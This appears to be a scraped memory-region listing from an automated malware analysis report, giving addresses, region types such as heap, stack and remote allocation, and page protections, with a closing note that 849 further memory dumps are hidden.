22329A30000
|
heap
|
page read and write
|
||
|
2B59ECD000
|
stack
|
page read and write
|
||
|
7C0A000
|
heap
|
page read and write
|
||
|
22329A1B000
|
heap
|
page read and write
|
||
|
1DB4BD1A000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
4C22000
|
heap
|
page read and write
|
||
|
223299F5000
|
heap
|
page read and write
|
||
|
22329AD2000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
22329990000
|
heap
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
1DB62B82000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
1DB5A781000
|
trusted library allocation
|
page read and write
|
||
|
22327C35000
|
heap
|
page read and write
|
||
|
236B8000
|
heap
|
page read and write
|
||
|
22327AD9000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4C0C000
|
heap
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
4512000
|
heap
|
page read and write
|
||
|
2B5947B000
|
stack
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
22329895000
|
heap
|
page read and write
|
||
|
4C32000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
23641000
|
heap
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
22327AFB000
|
heap
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
2328F000
|
stack
|
page read and write
|
||
|
5F19000
|
trusted library allocation
|
page read and write
|
||
|
223279F0000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
50AF000
|
stack
|
page read and write
|
||
|
302E000
|
heap
|
page read and write
|
||
|
298D000
|
heap
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
22329A2A000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page execute and read and write
|
||
|
7912000
|
heap
|
page read and write
|
||
|
7C2D000
|
stack
|
page read and write
|
||
|
22329991000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
22329AE1000
|
heap
|
page read and write
|
||
|
2B589EF000
|
stack
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
75DA000
|
stack
|
page read and write
|
||
|
22329A2A000
|
heap
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
223298BD000
|
heap
|
page read and write
|
||
|
223299BB000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
23AE0000
|
heap
|
page read and write
|
||
|
2320E000
|
stack
|
page read and write
|
||
|
22327A8F000
|
heap
|
page read and write
|
||
|
23640000
|
heap
|
page read and write
|
||
|
79CC000
|
heap
|
page read and write
|
||
|
7B20000
|
heap
|
page execute and read and write
|
||
|
22327A8E000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
223299B3000
|
heap
|
page read and write
|
||
|
2357B000
|
unclassified section
|
page execute and read and write
|
||
|
4E8C000
|
stack
|
page read and write
|
||
|
4D55000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
2F4C000
|
stack
|
page read and write
|
||
|
1DB4C1A8000
|
trusted library allocation
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
1DB4AE5E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
2352F000
|
stack
|
page read and write
|
||
|
28A7000
|
stack
|
page read and write
|
||
|
22327A7D000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
22329A10000
|
heap
|
page read and write
|
||
|
7A11000
|
heap
|
page read and write
|
||
|
1DB62B57000
|
heap
|
page read and write
|
||
|
1DB4C6CB000
|
trusted library allocation
|
page read and write
|
||
|
1DB4A6C7000
|
heap
|
page execute and read and write
|
||
|
7FFD3444B000
|
trusted library allocation
|
page read and write
|
||
|
2FE8000
|
heap
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
4D4A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
22327AEC000
|
heap
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
34DD000
|
stack
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
22329A91000
|
heap
|
page read and write
|
||
|
23A53000
|
unclassified section
|
page execute and read and write
|
||
|
9530000
|
direct allocation
|
page execute and read and write
|
||
|
8770000
|
trusted library allocation
|
page execute and read and write
|
||
|
323F000
|
unkown
|
page read and write
|
||
|
447F000
|
unkown
|
page read and write
|
||
|
8BD6000
|
heap
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
3E60000
|
remote allocation
|
page execute and read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
4EE8000
|
heap
|
page read and write
|
||
|
7405000
|
heap
|
page execute and read and write
|
||
|
1DB4C50D000
|
trusted library allocation
|
page read and write
|
||
|
23AD0000
|
heap
|
page read and write
|
||
|
7BF9000
|
heap
|
page read and write
|
||
|
223299B2000
|
heap
|
page read and write
|
||
|
47EF000
|
unkown
|
page read and write
|
||
|
1DB4A4A0000
|
heap
|
page readonly
|
There are 849 hidden memdumps, click here to show them.